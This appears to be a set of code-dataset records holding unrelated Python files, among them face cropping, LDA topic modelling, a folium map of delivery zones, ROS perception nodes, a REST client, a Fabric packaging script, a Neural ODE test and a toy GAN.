scale_points(faces_boxes[i], resized_img, original_image)\n # getting the list of center of the eyes for all faces\n eyes_center = (int(sum(original_face_points[:2,0])/2) , int(sum(original_face_points[:2,1])/2))\n original_rotation_mat = cv2.getRotationMatrix2D(eyes_center, angle[i], 1.0)\n \n \n\n\n # refer to affine transformation matrix definition \n rotated_original_image = cv2.warpAffine(original_image, original_rotation_mat, (width,height))\n # scale the bounding box to include areas around the face\n scaled_box = scale_box(original_box, 1.2)\n nose_position_rotated = apply_affine(original_face_points[2,:], original_rotation_mat)[0]\n \n # Center the cropping box around nose in the rotated original image\n box_width = abs(scaled_box[0,0] - scaled_box[1,0])\n box_height = abs(scaled_box[0,1] - scaled_box[1,1])\n box_nose_centered = np.array([[nose_position_rotated[0]-box_width//2, nose_position_rotated[1]-box_height//2], \\\n [nose_position_rotated[0]+box_width//2, nose_position_rotated[1]+box_height//2]])\n cropped_faces.append(safe_crop(rotated_original_image, scaled_box))\n \n return cropped_faces\n\n\n","sub_path":"DataCollection/mtcnn-face-extraction/extractor.py","file_name":"extractor.py","file_ext":"py","file_size_in_byte":8968,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"208707589","text":"from random import choice\r\n\r\nquestions = [\"Why do we need to brush our theeth:\",\"Where does our poop go:\", \"Why is running faster than walking:\"]\r\n\r\n\r\nquestion = choice(questions)\r\nanswer = input(question).strip().lower()\r\n\r\nwhile answer != \"just because\":\r\n\tanswer = input(\"why?: \").strip().lower()\r\n\r\nprint(\"Oh...Okay\")","sub_path":"baby.py","file_name":"baby.py","file_ext":"py","file_size_in_byte":321,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"268498341","text":"import pickle\n\nimport gensim.downloader as api\nimport spacy\nfrom django.core.management.base import BaseCommand, CommandError\nfrom gensim import corpora\nfrom gensim.models import LdaModel, LdaMulticore\nfrom spacy.tokens import Doc\nimport re\nfrom loguru import logger\nimport pandas as pd\nfrom sklearn.datasets import fetch_20newsgroups\n\n\nclass Command(BaseCommand):\n help = \"Build Model\"\n\n def _preprocess_doc(self, doc) -> list:\n \"\"\"tokenization function.\n\n Arguments:\n doc {?} -- A piece of doc\n\n Returns:\n [list] -- A list of tokens\n \"\"\"\n output = []\n for token in doc:\n\n # if (\n # token.is_stop\n # or token.is_punct\n # or token.like_email\n # or token.is_digit\n # or token.like_url\n # or token.is_space\n # or re.search(\"\\n\", token.text)\n # ):\n if token.is_alpha and not token.is_stop and len(token.text) >= 3:\n output.append(token.lemma_.lower())\n return output\n\n def handle(self, *args, **kwargs):\n newsgroups_train = fetch_20newsgroups(subset='train')\n dataset = newsgroups_train.data\n nlp = spacy.load(\"en_core_web_sm\")\n nlp.add_pipe(self._preprocess_doc, name = \"preprocess\")\n print(\"Preprocessing dataset...\")\n data_processed = list(map(nlp, dataset))\n\n with open(\"./data.pkl\", \"wb\") as f:\n pickle.dump(data_processed, f)\n\n print(\"Building dictionary...\")\n dct = corpora.Dictionary(data_processed)\n corpus = [dct.doc2bow(line) for line in data_processed]\n print(\"Building LDA Model...\")\n lda_model = LdaMulticore(\n corpus=corpus,\n id2word=dct,\n random_state=100,\n num_topics=6,\n passes=10,\n chunksize=1000,\n batch=False,\n alpha=\"asymmetric\",\n decay=0.5,\n offset=64,\n eta=None,\n eval_every=0,\n iterations=100,\n gamma_threshold=0.001,\n per_word_topics=True,\n )\n with open(\"./model.pkl\", \"wb\") as f:\n pickle.dump(lda_model, f)\n self.stdout.write(self.style.SUCCESS(\"Module Built\"))\n\n","sub_path":"neo/management/commands/build_model.py","file_name":"build_model.py","file_ext":"py","file_size_in_byte":2340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"248549499","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Tue Apr 9 11:45:40 2019\n\n@author: reeves\n\"\"\"\n\nimport getpass\nimport pandas as pd\nimport geopandas as gpd\nimport json\nfrom shapely.geometry import Point, shape\nimport folium as fm\nfrom branca.element import Template, MacroElement\n\n#%%\nchosen = False\nwhile chosen == False:\n service_type = input('''\n Please choose service type\n 1 : groceries\n 2 : food\n ''')\n \n if service_type == '1':\n df = pd.read_excel(r'file:///C:/Users/reeves/Desktop/operational/apartment_mapping/grocery_ff.xlsx')\n chosen = True\n \n elif service_type == '2':\n df = pd.read_excel(r'file:///C:/Users/reeves/Desktop/operational/apartment_mapping/food_ff.xlsx')\n chosen = True\n else:\n print('Incorrect input. Please try again.')\n \n\nzones = pd.read_csv(r'file:///C:/Users/reeves/Desktop/operational/zone_poly/zone_polygons.csv')\napartments = pd.read_csv(r'file:///C:/Users/reeves/Desktop/operational/apartment_mapping/apartment_coords.csv')\nstores = pd.read_csv('file:///C:/Users/reeves/Desktop/operational/apartment_mapping/priority_store_list.csv')\n\ndf.rename(columns={'Shipping Address Address Location' : 'drop_loc',\n 'Fulfillments Net Fulfillments' : 'net_ff'},\n inplace=True)\n\napartments.rename(columns={'Shipping Address Address Location': 'loc'},\n inplace=True)\n\nzones.rename(columns={'Zones Zone ID' : 'zone_id',\n 'Zones Zone Name' : 'zone_name',\n 'Zones Zone Area' : 'zone_polygon'},\n inplace=True)\n\nzones.dropna(inplace=True)\nzones.reset_index(drop=True, inplace=True)\n\n#%%\nr_zone_poly_list = []\nzone_poly_list = []\nprint('Creating shapely Shapes...')\nfor i in range(len(zones.zone_polygon)):\n polygon = json.loads(zones.zone_polygon[i])\n zone_poly_list.append(shape(polygon))\n \n for j in range(len(polygon['coordinates'][0])):\n long = polygon['coordinates'][0][j][0]\n lat = polygon['coordinates'][0][j][1]\n polygon['coordinates'][0][j][0] = lat\n polygon['coordinates'][0][j][1] = long\n \n r_zone_poly_list.append(shape(polygon))\n print(i)\n\nzones = zones.assign(r_zone_polygon=r_zone_poly_list,\n zone_polygon=zone_poly_list)\n\n#%%\n\ndrop_zone_id_list = []\nprint('Appending Zone IDs..')\nfor i in range(len(df.drop_loc)):\n p1, p2 = df.drop_loc[i].split(',')[0], df.drop_loc[i].split(',')[1]\n p1 = float(p1)\n p2 = float(p2)\n point = Point(p1, p2)\n check = False\n \n for j in range(len(zones.r_zone_polygon)):\n if zones.r_zone_polygon[j].contains(point) == True:\n drop_zone_id_list.append(zones.zone_id[j])\n print(i, point, zones.zone_id[j])\n check = True\n \n if check == False:\n drop_zone_id_list.append(None)\n print(i, point)\n \n \ndf = df.assign(zone_id = drop_zone_id_list)\n#%%\nprint('Left Join!')\n\ndf.drop(columns=['drop_loc',\n 'drop_zone',\n 'Fulfillments Operation Local Delivery Timeslot Starts Week of Year',\n 'Fulfillments Service Type'],\n inplace=True)\ndf.reset_index(drop=True, inplace=True)\n\ndf = df.groupby(['zone_id'], as_index=False).net_ff.sum()\nzones = zones.merge(df, how='left', on='zone_id')\n\nzones.drop(columns=['r_zone_polygon'], inplace=True)\nzones.fillna(0, inplace=True)\ngdf = gpd.GeoDataFrame(zones, geometry='zone_polygon')\n#%%\nprint('Creating Map') \ndist_map = fm.Map(location=[35.6762, 139.6503],\n zoom_start=10,\n tiles='StamenToner')\n\nfm.GeoJson(data=gdf.to_json(),\n style_function= lambda x :{'fillColor':'#FF2A1C' if \\\n x['properties']['net_ff']>=250 \\\n else '#FFC133' if x['properties']['net_ff']>=100 \\\n else '#80FF00' if x['properties']['net_ff']>=50 \\\n else '#00FFCF' if x['properties']['net_ff']>=10 \\\n else '#00CFFF' if x['properties']['net_ff']>0 \\\n else '#A09898',\n 'fillOpacity': 0.7,\n 'color': 'black',\n 'weight' : 1},\n name='Order Distribution',\n tooltip=fm.GeoJsonTooltip(['zone_name', 'zone_id', 'net_ff'],\n aliases=['Zone Name', 'Zone ID', 'Net FF'])).add_to(dist_map)\n\nlayer = fm.FeatureGroup(name='Apartments')\n\nfor apartment in apartments.itertuples(index=False, name=None):\n apartment_coords = [float(apartment[4].split(',')[0]),\n float(apartment[4].split(',')[1])]\n fm.Marker(location=apartment_coords,\n popup=apartment[0],\n icon=fm.Icon(icon='archway',\n color='black',\n prefix='fa')).add_to(layer)\n\nstore_points = fm.FeatureGroup(name='Stores')\n\nfor store in stores.itertuples(index=False, name=None):\n store_coords = [float(store[1].split(',')[0]),\n float(store[1].split(',')[1])]\n fm.Marker(location=store_coords,\n popup=store[0],\n icon=fm.Icon(icon='cart-plus',\n color='pink',\n prefix='fa')).add_to(store_points)\ntemplate = \"\"\"\n{% macro html(this, kwargs) %}\n\n\n\n\n \n \n Grocery - 3 Months\n \n\n \n \n \n \n\n\n\n \n
\n \n
Legend
\n
\n
    \n
  • > 250
  • \n
  • > 100
  • \n
  • > 50
  • \n
  • > 10
  • \n
  • > 0
  • \n
\n
\n
\n \n\n\n\n\n{% endmacro %}\"\"\"\n\nmacro = MacroElement()\nmacro._template = Template(template)\n\ndist_map.get_root().add_child(macro)\ndist_map.add_child(layer)\ndist_map.add_child(store_points)\nfm.LayerControl().add_to(dist_map)\nprint('Saving Map...')\n#%%\n\nif service_type == 1:\n dist_map.save(r'C:/Users/{0}/Desktop/grocery_output.html'.format(getpass.getuser()))\n \nelse:\n dist_map.save(r'c:/Users/{0}/Desktop/food_output.html'.format(getpass.getuser()))\n \nprint('Map Saved!')\n","sub_path":"apartment_mapping/apartment_mapping.py","file_name":"apartment_mapping.py","file_ext":"py","file_size_in_byte":8278,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"151574314","text":"import sys\n\nmortgage = float(input(\"Enter mortgage amount you wish to borrow: $\"))\ninterestRate = float(input(\"Annual interest rate percentage \"))\nnumYears = float(input(\"Years to clear: \"))\n\n\ninterestRate = interestRate / 1200\nnumYears = numYears * 12\n\npayment = mortgage *((interestRate*(1+interestRate)**numYears)/((1+ interestRate)**numYears -1))\n\npayment = round(payment, 2)\nprint(\"Your Monthly Payment: $\", payment)\n","sub_path":"mortgageProgram.py","file_name":"mortgageProgram.py","file_ext":"py","file_size_in_byte":422,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"210001813","text":"\"\"\"\nMDB.\n\nhttps://github.com/GII/MDB\n\"\"\"\n\n# Standard imports\nimport threading\n\n# Library imports\nimport rospy\n\n# MDB imports\nfrom mdb_ltm.node import Node\n\n\nclass Perception(Node):\n \"\"\"A perception. Its content cames from a sensor or a redescription and it is stored in a memory.\"\"\"\n\n def __init__(self, **kwargs):\n \"\"\"Init attributes when a new object is created.\"\"\"\n super(Perception, self).__init__(**kwargs)\n # Init data storage attributes\n self.old_raw = 0.0\n self.raw = 0.0\n self.old_value = 0.0\n self.value = 0.0\n # Init thread syncronizing stuff\n self.semaphore = None\n self.flag = None\n self.init_threading()\n\n def __getstate__(self):\n \"\"\"Return the object to be serialize with PyYAML as the result of removing the unpicklable entries.\"\"\"\n state = super().__getstate__()\n del state[\"semaphore\"]\n del state[\"flag\"]\n return state\n\n def init_threading(self):\n \"\"\"Create needed stuff to synchronize threads.\"\"\"\n self.semaphore = threading.Semaphore()\n self.flag = threading.Event()\n\n def init_ros(self):\n \"\"\"Create publishers and make subscriptions.\"\"\"\n super().init_ros()\n rospy.logdebug(\"Subscribing to %s...\", self.data_topic)\n rospy.Subscriber(self.data_topic, self.data_message, callback=self.read_callback)\n\n def calc_activation(self, perception=None):\n \"\"\"Calculate the new activation value.\"\"\"\n rospy.logerr(\"Someone call calc_activation on a perception, this should not happen!!!\")\n\n def read_callback(self, reading):\n \"\"\"Get sensor data from ROS topic.\"\"\"\n self.semaphore.acquire()\n rospy.logdebug(\"Receiving \" + self.ident + \" = \" + str(reading))\n self.old_raw = self.raw\n self.raw = reading\n self.old_value = self.value\n self.process_reading()\n self.flag.set()\n self.semaphore.release()\n\n def process_reading(self):\n \"\"\"Process the new sensor reading.\"\"\"\n self.value = []\n self.value.append(dict(data=self.raw.data))\n\n def read(self):\n \"\"\"Obtain a new value for the sensor / redescription.\"\"\"\n self.flag.wait()\n self.flag.clear()\n return self.value\n\n\nclass ObjectListPerception(Perception):\n \"\"\"A perception corresponding with a list of objects.\"\"\"\n\n def __init__(self, data=None, **kwargs):\n \"\"\"Init attributes when a new object is created.\"\"\"\n self.normalize_values = data\n super(ObjectListPerception, self).__init__(**kwargs)\n\n def process_reading(self):\n \"\"\"Process the new sensor reading.\"\"\"\n self.value = []\n for perception in self.raw.data:\n distance = (perception.distance - self.normalize_values[\"distance_min\"]) / (\n self.normalize_values[\"distance_max\"] - self.normalize_values[\"distance_min\"]\n )\n angle = (perception.angle - self.normalize_values[\"angle_min\"]) / (\n self.normalize_values[\"angle_max\"] - self.normalize_values[\"angle_min\"]\n )\n diameter = (perception.diameter - self.normalize_values[\"diameter_min\"]) / (\n self.normalize_values[\"diameter_max\"] - self.normalize_values[\"diameter_min\"]\n )\n self.value.append(dict(distance=distance, angle=angle, diameter=diameter, id=perception.id))\n","sub_path":"mdb_ltm/src/mdb_ltm/perception.py","file_name":"perception.py","file_ext":"py","file_size_in_byte":3411,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"349476978","text":"import numpy as np\nfrom prody import LOGGER, SETTINGS\nfrom prody.utilities import showFigure\nfrom prody.chromatin.functions import _getEigvecs\n\n__all__ = ['calcGNMDomains', 'KMeans', 'Hierarchy', 'Discretize', 'showLinkage']\n\ndef KMeans(V, **kwargs):\n \"\"\"Performs k-means clustering on *V*. The function uses :func:`sklearn.cluster.KMeans`. See sklearn documents \n for details.\n\n :arg V: row-normalized eigenvectors for the purpose of clustering.\n :type V: :class:`numpy.ndarray`\n\n :arg n_clusters: specifies the number of clusters. \n :type n_clusters: int\n \"\"\"\n\n try:\n from sklearn.cluster import KMeans\n except ImportError:\n raise ImportError('Use of this function (KMeans) requires the '\n 'installation of sklearn.')\n \n n_clusters = kwargs.get('n_clusters', None)\n if n_clusters is None:\n raise ValueError('KMeans requires to desiginate the number of clusters.')\n \n n_init = kwargs.pop('n_init', 100)\n \n kmeans = KMeans(n_init=n_init, **kwargs).fit(V)\n return kmeans.labels_\n\ndef Hierarchy(V, **kwargs):\n \"\"\"Performs hierarchical clustering on *V*. The function essentially uses two scipy functions: ``linkage`` and \n ``fcluster``. See :func:`scipy.cluster.hierarchy.linkage` and :func:`scipy.cluster.hierarchy.fcluster` for the \n explaination of the arguments. Here lists arguments that are different from those of scipy.\n\n :arg V: row-normalized eigenvectors for the purpose of clustering.\n :type V: :class:`numpy.ndarray`\n\n :arg inconsistent_percentile: if the clustering *criterion* for :func:`scipy.cluster.hierarchy.fcluster`\n is ``inconsistent`` and threshold *t* is not given (default), then the function will use the percentile specified \n by this argument as the threshold.\n :type inconsistent_percentile: double\n\n :arg n_clusters: specifies the maximal number of clusters. If this argument is given, then the function will \n automatically set *criterion* to ``maxclust`` and *t* equal to *n_clusters*.\n :type n_clusters: int\n \"\"\"\n\n from scipy.cluster.hierarchy import linkage, fcluster, inconsistent\n \n method = kwargs.pop('method', 'single')\n metric = kwargs.pop('metric', 'euclidean')\n Z = linkage(V, method=method, metric=metric)\n \n criterion = kwargs.pop('criterion', 'inconsistent')\n t = kwargs.get('t', None)\n ip = kwargs.pop('inconsistent_percentile', 99.9)\n if t is None and criterion == 'inconsistent':\n I = inconsistent(Z)\n i = np.percentile(I[:,3], ip)\n\n t = kwargs.pop('t', i)\n depth = kwargs.pop('depth', 2)\n R = kwargs.pop('R', None)\n monocrit = kwargs.pop('monocrit', None)\n\n n_clusters = kwargs.pop('n_clusters', None)\n if n_clusters is not None:\n criterion = 'maxclust'\n t = n_clusters\n labels = fcluster(Z, t, criterion=criterion, depth=depth, R=R, monocrit=monocrit)\n return labels.flatten()\n\ndef Discretize(V, **kwargs):\n try:\n from sklearn.cluster.spectral import discretize\n except ImportError:\n raise ImportError('Use of this function (Discretize) requires the '\n 'installation of sklearn.')\n\n copy = kwargs.pop('copy', True)\n max_svd_restarts = kwargs.pop('max_svd_restarts', 30)\n n_iter_max = kwargs.pop('n_iter_max', 20)\n random_state = kwargs.pop('random_state', None)\n\n labels = discretize(V, copy=copy, max_svd_restarts=max_svd_restarts, \n n_iter_max=n_iter_max, random_state=random_state)\n return labels\n\ndef showLinkage(V, **kwargs):\n \"\"\"Shows the dendrogram of hierarchical clustering on *V*. See :func:`scipy.cluster.hierarchy.dendrogram` for details.\n\n :arg V: row-normalized eigenvectors for the purpose of clustering.\n :type V: :class:`numpy.ndarray`\n\n \"\"\"\n\n V, _ = _getEigvecs(V, row_norm=True, remove_zero_rows=True)\n try:\n from scipy.cluster.hierarchy import linkage, dendrogram\n except ImportError:\n raise ImportError('Use of this function (showLinkage) requires the '\n 'installation of scipy.')\n \n method = kwargs.pop('method', 'single')\n metric = kwargs.pop('metric', 'euclidean')\n Z = linkage(V, method=method, metric=metric)\n\n no_labels = kwargs.pop('no_labels', True)\n dendrogram(Z, no_labels=no_labels, **kwargs)\n if SETTINGS['auto_show']:\n showFigure()\n return Z\n \ndef calcGNMDomains(modes, method=Hierarchy, **kwargs):\n \"\"\"Uses spectral clustering to separate structural domains in the chromosome.\n \n :arg modes: GNM modes used for segmentation\n :type modes: :class:`ModeSet`\n\n :arg method: Label assignment algorithm used after Laplacian embedding of loci.\n :type method: func\n \"\"\"\n\n V, mask = _getEigvecs(modes, row_norm=True, remove_zero_rows=True)\n\n labels_ = method(V, **kwargs)\n\n labels = np.empty(len(mask))\n labels.fill(np.nan)\n labels[mask] = labels_\n\n currlbl = labels_[np.argmax(~np.isnan(labels_))]\n\n for i in range(len(labels)):\n l = labels[i]\n if np.isnan(l):\n labels[i] = currlbl\n elif currlbl != l:\n currlbl = l\n\n return labels\n ","sub_path":"Docker_Image/dock_group/ProDy/prody/chromatin/cluster.py","file_name":"cluster.py","file_ext":"py","file_size_in_byte":5196,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"82"} +{"seq_id":"199717722","text":"# -*- coding: utf-8 -*-\n\nimport requests\nfrom sparrow_cloud.registry.service_discovery import consul_service\nfrom .exception import HTTPException\n\n\ndef get(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: 服务配置\n '''\n url = _build_url(service_conf, api_path)\n res = requests.get(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef post(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: settings 里面配置的服务注册 key 值\n '''\n url = _build_url(service_conf, api_path)\n # import pdb; pdb.set_trace()\n res = requests.post(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef put(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: settings 里面配置���服务注册 key 值\n '''\n url = _build_url(service_conf, api_path)\n res = requests.put(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef delete(service_conf, api_path, *args, **kwargs):\n '''\n service_conf: settings 里面配置的服务注册 key 值\n '''\n url = _build_url(service_conf, api_path)\n # import pdb; pdb.set_trace()\n res = requests.delete(url, *args, **kwargs)\n return _handle_response(res)\n\n\ndef _build_url(service_conf, api_path):\n servicer_addr = consul_service(service_conf)\n return \"http://{}{}\".format(servicer_addr, api_path)\n\n\ndef _handle_response(response):\n if 200 <= response.status_code < 300:\n if response.content:\n try:\n res_result = response.json()\n except Exception as ex:\n res_result = {\n \"data\": response.content,\n \"message\": str(ex),\n }\n else:\n res_result = {}\n return res_result\n else:\n xx = HTTPException(\n code=\"http_exception\",\n detail=response.content,\n )\n xx.status_code = response.status_code\n raise xx\n","sub_path":"sparrow_cloud/restclient/rest_client.py","file_name":"rest_client.py","file_ext":"py","file_size_in_byte":1943,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"169294969","text":"\"\"\"\nPractice 4\nName: 陳彥呈\nStudent Number:109502569\nCourse 2020-CE1003-B\n\"\"\"\ndef func(x,c,y,z):\n\tif c=='+':\n\t\tif x+y==z:return 1\n\telif c=='-':\n\t\tif x-y==z:return 1\n\telif c=='*':\n\t\tif x*y==z:return 1\n\telif c=='/':\n\t\tif x/y==z:return 1\n\treturn 0\ninput_f = open(\"test.txt\",'r')\noutput_f = open(\"ans-109502569.txt\",'w')\nfor line in input_f:\n\tif func(int(line.split()[0]),line.split()[1],int(line.split()[2]),int(line.split()[4])):\n\t\toutput_f.write('T\\n')\n\telse :\n\t\toutput_f.write('F\\n')\ninput_f.close()\noutput_f.close()","sub_path":"P4-109502569/P4-109502569.py","file_name":"P4-109502569.py","file_ext":"py","file_size_in_byte":519,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"139901661","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import migrations, models\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('page', '0002_applicationcontent_button_campaign_documentsetcontent_facebook_findalocalhealthservice_image_library'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='applicationcontent',\n name='urlconf_path',\n field=models.CharField(max_length=100, verbose_name='application', choices=[('omnis.research.gaps.urls', 'Research gaps'), ('omnis.news.urls', 'News'), ('omnis.research.urls', 'Research'), ('omnis.contact.contact_urls', 'Contact Form'), ('omnis.contact.pals_urls', 'PALS Contact Form'), ('omnis.organisations.member_urls', 'Members'), ('omnis.events.urls', 'Events'), ('omnis.innf.urls', 'INNF'), ('omnis.library.urls', 'Library'), ('omnis.faqs.urls', 'FAQs'), ('omnis.organisations.leader_urls', 'Governors'), ('omnis.nhs_choices.urls', 'Find Local Health Services'), ('omnis.waiting_times_table.urls', 'Waiting Times Table')]),\n ),\n migrations.AlterField(\n model_name='singledocumentcontent',\n name='document',\n field=models.ForeignKey(to='library.Document'),\n ),\n ]\n","sub_path":"migrations/page/0003_auto_20160627_1237.py","file_name":"0003_auto_20160627_1237.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"221291874","text":"#!/usr/bin/env python\nimport roslib; roslib.load_manifest('teleop_twist_keyboard')\nimport rospy\n\nfrom geometry_msgs.msg import Twist\nfrom std_msgs.msg import String\n\nimport sys, select, termios, tty\n\ndef getKey():\n\ttty.setraw(sys.stdin.fileno())\n\tselect.select([sys.stdin], [], [], 0)\n\tkey = sys.stdin.read(1)\n\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n\treturn key\n\n\ndef vels(speed,turn):\n\treturn \"currently:\\tspeed %s\\tturn %s \" % (speed,turn)\n\nif __name__==\"__main__\":\n\tsettings = termios.tcgetattr(sys.stdin)\n\tpub = rospy.Publisher('cmd_key', String, queue_size = 1)\n\trospy.init_node('keyboard')\n\t# speed = rospy.get_param(\"~speed\", 0.5)\n\t# turn = rospy.get_param(\"~turn\", 1.0)\n\tstatus = 0\n\ttry:\n\t\t# print vels(speed,turn)\n\t\twhile(1):\n\t\t\tkey = getKey()\n\t\t\tprint(key)\n\t\t\tif (key == '\\x03'):\n\t\t\t\tbreak\n\t\t\tpub.publish(key)\n\texcept:\n\t\tprint(e)\n\tfinally:\n\t\t# pub.publish(twist)\n \t\ttermios.tcsetattr(sys.stdin, termios.TCSADRAIN, settings)\n","sub_path":"scripts/key_direct.py","file_name":"key_direct.py","file_ext":"py","file_size_in_byte":956,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"252251139","text":"#!/usr/bin/python3\n\"\"\" Compressing with fabric, web static to web01/02 \"\"\"\nfrom fabric.api import local\nfrom datetime import datetime\n\ndef do_pack():\n \"\"\" Pack up the front end \"\"\"\n try:\n now = datetime.now()\n\n tarArchiveName = \"web_static_\" + now.strftime(\"%Y%m%d%H%M%S\") + \".tgz\"\n tarArchivePath = \"versions/\" + tarArchiveName\n\n local(\"mkdir -p versions\")\n local(\"tar -czvf \" + tarArchivePath + \" web_static\")\n return tarArchivePath\n except:\n return None\n","sub_path":"1-pack_web_static.py","file_name":"1-pack_web_static.py","file_ext":"py","file_size_in_byte":515,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"569186642","text":"r\"\"\"C.f. `./test_mnist_dense.py`\"\"\"\n\nimport numpy as np\nimport tensorflow as tf\nfrom node.core import get_node_function\nfrom node.fix_grid import RKSolver\nfrom node.utils.initializers import GlorotUniform\n\n\n# for reproducibility\nnp.random.seed(42)\ntf.random.set_seed(42)\n\n\n@tf.function\ndef normalize(x, axis=None):\n M = tf.reduce_max(x, axis, keepdims=True)\n m = tf.reduce_min(x, axis, keepdims=True)\n return (x - m) / (M - m + 1e-8)\n\n\nclass MyLayer(tf.keras.layers.Layer):\n\n def __init__(self, units, dt, num_grids, **kwargs):\n super().__init__(**kwargs)\n self.dt = dt\n self.num_grids = num_grids\n\n t0 = tf.constant(0.)\n self.tN = t0 + num_grids * dt\n\n self._model = tf.keras.Sequential([\n tf.keras.layers.Dense(128, activation='relu',\n kernel_initializer=GlorotUniform(1e-1)),\n tf.keras.layers.Dense(units, activation='relu',\n kernel_initializer=GlorotUniform(1e-1)),\n ])\n self._model.build([None, units])\n\n @tf.function\n def fn(t, x):\n z = self._model(x)\n with tf.GradientTape() as g:\n g.watch(x)\n r = normalize(x, axis=-1)\n return g.gradient(r, x, z)\n\n self._node_fn = get_node_function(\n RKSolver(self.dt), tf.constant(0.), fn)\n\n def call(self, x):\n y = self._node_fn(self.tN, x)\n return y\n\n\ndef process(X, y):\n X = X / 255.\n X = tf.reshape(X, [-1, 28 * 28])\n y = tf.one_hot(y, 10)\n return tf.cast(X, tf.float32), tf.cast(y, tf.float32)\n\n\nmnist = tf.keras.datasets.mnist\n(x_train, y_train), (x_test, y_test) = mnist.load_data()\nx_train, y_train = process(x_train, y_train)\nx_test, y_test = process(x_test, y_test)\n\nmodel = tf.keras.Sequential([\n tf.keras.layers.Input([28 * 28]),\n tf.keras.layers.Dense(64, activation='relu'),\n MyLayer(64, dt=1e-1, num_grids=10),\n tf.keras.layers.Dense(10, activation='softmax')\n])\n\nmodel.compile(\n optimizer=tf.keras.optimizers.Adam(),\n loss='categorical_crossentropy',\n metrics=['accuracy'])\nmodel.summary()\n\nmodel.fit(x_train, y_train,\n epochs=10,\n validation_data=(x_test, y_test))\n","sub_path":"tests/test_mnist_dense_keras.py","file_name":"test_mnist_dense_keras.py","file_ext":"py","file_size_in_byte":2244,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"507327958","text":"import numpy as np\nimport torch\nimport matplotlib.pyplot as plt\nimport torch.functional as func\nfrom torch.autograd import Variable\n\nBATCH_SIZE = 64\nN_IDEAS = 5\nD_LR = 0.0001\nG_LR = 0.0001\nART_COMPONENTS = 15\n\nPOINT_POINTS = torch.cat([torch.linspace(-1, 1, ART_COMPONENTS).view(1, -1) for _ in range(BATCH_SIZE)], 0)\n\n\ndef artist_works():\n a = np.random.uniform(1, 2, size=BATCH_SIZE)[:, np.newaxis]\n paintings = a * torch.pow(POINT_POINTS, 2).numpy() + (a - 1)\n paintings = torch.from_numpy(paintings).float() # .type(torch.FloatTensor)\n return Variable(paintings)\n\n\n# plt.plot(POINT_POINTS[0].numpy(),2*torch.pow(POINT_POINTS[0],2).numpy()+1)\n# plt.plot(POINT_POINTS[0].numpy(),1*torch.pow(POINT_POINTS[0],2).numpy())\n# plt.show()\n\nD = torch.nn.Sequential(\n torch.nn.Linear(ART_COMPONENTS, 128),\n torch.nn.ReLU(),\n torch.nn.Linear(128, 1),\n torch.nn.Sigmoid(),\n)\n\nG = torch.nn.Sequential(\n torch.nn.Linear(N_IDEAS, 128),\n torch.nn.ReLU(),\n torch.nn.Linear(128, ART_COMPONENTS),\n)\n\nD_optimzer = torch.optim.Adam(D.parameters(), lr=D_LR)\nG_optimzer = torch.optim.Adam(G.parameters(), lr=G_LR)\n\nfor epoch in range(10000):\n artist_paints = artist_works()\n G_ideas = Variable(torch.randn(BATCH_SIZE, N_IDEAS))\n G_paints = G(G_ideas)\n prob_artist0 = D(artist_paints)\n prob_artist1 = D(G_paints)\n loss_D = -torch.mean(torch.log(prob_artist0) + torch.log(1. - prob_artist1))\n loss_G = torch.mean(torch.log(1. - prob_artist1))\n\n D_optimzer.zero_grad()\n loss_D.backward(retain_variables=True)\n D_optimzer.step()\n\n G_optimzer.zero_grad()\n loss_G.backward()\n G_optimzer.step()\n\n if epoch % 1000 == 0:\n plt.plot(POINT_POINTS[0].numpy(), 2 * torch.pow(POINT_POINTS[0], 2).numpy() + 1, lw=3, c='red',\n label='Upper Bound')\n plt.plot(POINT_POINTS[0].numpy(), 1 * torch.pow(POINT_POINTS[0], 2).numpy(), lw=3, c='green',\n label='Lower Bound')\n plt.plot(POINT_POINTS[0].numpy(), G_paints.data.numpy()[0], lw=2, c='yellow', label='Generated Paint')\n plt.text(-0.5, 2.3, 'D accuracy = %.2f' % prob_artist0.data.numpy().mean())\n plt.text(-0.5, 2, 'D score = %.2f' % -loss_D.data.numpy())\n plt.legend(loc='best')\n # plt.pause(0.5)\n plt.show()\n","sub_path":"pytorch_step1/GAN.py","file_name":"GAN.py","file_ext":"py","file_size_in_byte":2287,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"228010400","text":"\n\n#calss header\nclass _FASTENING():\n\tdef __init__(self,): \n\t\tself.name = \"FASTENING\"\n\t\tself.definitions = [u'a device on a window, door, box, etc. for keeping it closed']\n\n\t\tself.parents = []\n\t\tself.childen = []\n\t\tself.properties = []\n\t\tself.jsondata = {}\n\n\n\t\tself.specie = 'nouns'\n\n\n\tdef run(self, obj1 = [], obj2 = []):\n\t\treturn 